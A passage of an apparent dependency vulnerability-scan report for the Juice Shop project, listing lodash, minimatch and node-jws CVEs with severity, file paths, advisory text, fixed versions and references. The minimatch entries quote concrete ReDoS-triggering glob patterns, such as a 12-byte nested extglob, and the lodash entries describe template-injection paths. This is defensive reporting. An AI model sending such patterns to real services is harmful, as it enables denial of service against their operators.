auth0/node-jws is a JSON Web Signature implementation for Node.js. In + versions 3.2.2 and earlier and version 4.0.0, auth0/node-jws has an +improper signature verification vulnerability when using the HS256 +algorithm under specific conditions. Applications are affected when they + use the jws.createVerify() function for HMAC algorithms and use +user-provided data from the JSON Web Signature protected header or +payload in HMAC secret lookup routines, which can allow attackers to +bypass signature verification. This issue has been patched in versions +3.2.3 and 4.0.1.

+ + +
Mitigation
+

3.2.3, 4.0.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2025-65945
+https://github.com/auth0/node-jws
+https://github.com/auth0/node-jws/commit/34c45b2c04434f925b638de6a061de9339c0ea2e
+https://github.com/auth0/node-jws/commit/4f6e73f24df42f07d632dec6431ade8eda8d11a6
+https://github.com/auth0/node-jws/releases/tag/v3.2.3
+https://github.com/auth0/node-jws/releases/tag/v4.0.1
+https://github.com/auth0/node-jws/security/advisories/GHSA-869p-cjfg-cm3x
+https://nvd.nist.gov/vuln/detail/CVE-2025-65945
+https://www.cve.org/CVERecord?id=CVE-2025-65945

+ + + + + + + +
+
+
+
+ Finding 118: CVE-2018-16487 Lodash 2.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash2.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

+ + +
Description
+

lodash: Prototype pollution in utilities function
+Target: Node.js
+Type: node-pkg
+Fixed version: >=4.17.11

+

A prototype pollution vulnerability was found in lodash <4.17.11 +where the functions merge, mergeWith, and defaultsDeep can be tricked +into adding or modifying properties of Object.prototype.

+ + +
Mitigation
+
+

=4.17.11

+
+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2018-16487
+https://github.com/advisories/GHSA-4xc9-xhrj-v574
+https://github.com/lodash/lodash/commit/90e6199a161b6445b01454517b40ef65ebecd2ad
+https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2018-16487.yml
+https://hackerone.com/reports/380873
+https://nvd.nist.gov/vuln/detail/CVE-2018-16487
+https://security.netapp.com/advisory/ntap-20190919-0004
+https://security.netapp.com/advisory/ntap-20190919-0004/
+https://www.cve.org/CVERecord?id=CVE-2018-16487
+https://www.npmjs.com/advisories/782

+ + + + + + + +
+
+
+
+ Finding 119: CVE-2021-23337 Lodash 2.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash2.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

nodejs-lodash: command injection via template
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.17.21

+

Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.

+ + +
Mitigation
+

4.17.21

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2021-23337
+https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
+https://github.com/advisories/GHSA-35jh-r3h4-6jhm
+https://github.com/lodash/lodash
+https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js
+https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851
+https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js%23L14851
+https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c
+https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2021-23337.yml
+https://nvd.nist.gov/vuln/detail/CVE-2021-23337
+https://security.netapp.com/advisory/ntap-20210312-0006
+https://security.netapp.com/advisory/ntap-20210312-0006/
+https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932
+https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930
+https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928
+https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931
+https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929
+https://snyk.io/vuln/SNYK-JS-LODASH-1040724
+https://www.cve.org/CVERecord?id=CVE-2021-23337
+https://www.oracle.com//security-alerts/cpujul2021.html
+https://www.oracle.com/security-alerts/cpujan2022.html
+https://www.oracle.com/security-alerts/cpujul2022.html
+https://www.oracle.com/security-alerts/cpuoct2021.html

+ + + + + + + +
+
+
+
+ Finding 122: CVE-2026-4800 Lodash 4.17.21 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash4.17.21
+ + + + + + + +
File Path
juice-shop/node_modules/lodash/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

lodash: lodash: Arbitrary code execution via untrusted input in template imports
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.18.0

+

Impact:

+

The fix for CVE-2021-23337 +(https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for + the variable option in _.template but did not apply the same validation + to options.imports key names. Both paths flow into the same Function() +constructor sink.

+

When an application passes untrusted input as options.imports key +names, an attacker can inject default-parameter expressions that execute + arbitrary code at template compilation time.

+

Additionally, _.template uses assignInWith to merge imports, which +enumerates inherited properties via for..in. If Object.prototype has +been polluted by any other vector, the polluted keys are copied into the + imports object and passed to Function().

+

Patches:

+

Users should upgrade to version 4.18.0.

+

Workarounds:

+

Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.

+ + +
Mitigation
+

4.18.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:10710
+https://access.redhat.com/security/cve/CVE-2026-4800
+https://bugzilla.redhat.com/2453496
+https://cna.openjsf.org/security-advisories.html
+https://errata.almalinux.org/9/ALSA-2026-10710.html
+https://github.com/advisories/GHSA-35jh-r3h4-6jhm
+https://github.com/lodash/lodash
+https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c
+https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc
+https://linux.oracle.com/cve/CVE-2026-4800.html
+https://linux.oracle.com/errata/ELSA-2026-10713.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-4800
+https://www.cve.org/CVERecord?id=CVE-2026-4800

+ + + + + + + +
+
+
+
+ Finding 125: CVE-2020-8203 lodash.set 4.3.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 770 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash.set4.3.2
+ + + + + + + +
File Path
juice-shop/node_modules/lodash.set/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H

+ + +
Description
+

nodejs-lodash: prototype pollution in zipObjectDeep function
+Target: Node.js
+Type: node-pkg
+Fixed version:

+

Prototype pollution attack when using _.zipObjectDeep in lodash before 4.17.20.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2020-8203
+https://github.com/advisories/GHSA-p6mc-m468-83gw
+https://github.com/github/advisory-database/pull/2884
+https://github.com/lodash/lodash
+https://github.com/lodash/lodash/commit/c84fe82760fb2d3e03a63379b297a1cc1a2fce12
+https://github.com/lodash/lodash/issues/4744
+https://github.com/lodash/lodash/issues/4874
+https://github.com/lodash/lodash/wiki/Changelog#v41719
+https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-8203.yml
+https://hackerone.com/reports/712065
+https://hackerone.com/reports/864701
+https://nvd.nist.gov/vuln/detail/CVE-2020-8203
+https://security.netapp.com/advisory/ntap-20200724-0006
+https://security.netapp.com/advisory/ntap-20200724-0006/
+https://web.archive.org/web/20210914001339/https://github.com/lodash/lodash/issues/4744
+https://www.cve.org/CVERecord?id=CVE-2020-8203
+https://www.npmjs.com/advisories/1523
+https://www.oracle.com//security-alerts/cpujul2021.html
+https://www.oracle.com/security-alerts/cpuApr2021.html
+https://www.oracle.com/security-alerts/cpuapr2022.html
+https://www.oracle.com/security-alerts/cpujan2022.html
+https://www.oracle.com/security-alerts/cpuoct2021.html

+ + + + + + + +
+
+
+
+ Finding 129: CVE-2026-26996 Minimatch 3.0.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.0.5
+ + + + + + + +
File Path
juice-shop/node_modules/replace/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 130: CVE-2026-27903 Minimatch 3.0.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.0.5
+ + + + + + + +
File Path
juice-shop/node_modules/replace/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 131: CVE-2026-27904 Minimatch 3.0.5 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.0.5
+ + + + + + + +
File Path
juice-shop/node_modules/replace/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 132: CVE-2026-26996 Minimatch 3.0.8 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.0.8
+ + + + + + + +
File Path
juice-shop/node_modules/grunt/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5
+https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26
+https://linux.oracle.com/cve/CVE-2026-26996.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-26996
+https://www.cve.org/CVERecord?id=CVE-2026-26996

+ + + + + + + +
+
+
+
+ Finding 133: CVE-2026-27903 Minimatch 3.0.8 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.0.8
+ + + + + + + +
File Path
juice-shop/node_modules/grunt/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 134: CVE-2026-27904 Minimatch 3.0.8 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.0.8
+ + + + + + + +
File Path
juice-shop/node_modules/grunt/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 135: CVE-2026-26996 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/archiver-utils/node_modules/minimatch/package.json
+
+
+
+ + + + + +
Description
+

minimatch: minimatch: Denial of Service via specially crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Versions 10.2.0 and below +are vulnerable to Regular Expression Denial of Service (ReDoS) when a +glob pattern contains many consecutive * wildcards followed by a literal + character that doesn't appear in the test string. Each * compiles to a +separate [^/]*? regex group, and when the match fails, V8's regex engine + backtracks exponentially across all possible splits. The time +complexity is O(4^N) where N is the number of * characters. With N=15, a + single minimatch() call takes ~2 seconds. With N=34, it hangs +effectively forever. Any application that passes user-controlled strings + to minimatch() as the pattern argument is vulnerable to DoS. This issue + has been fixed in version 10.2.1.

+ + +
Mitigation
+

10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-26996
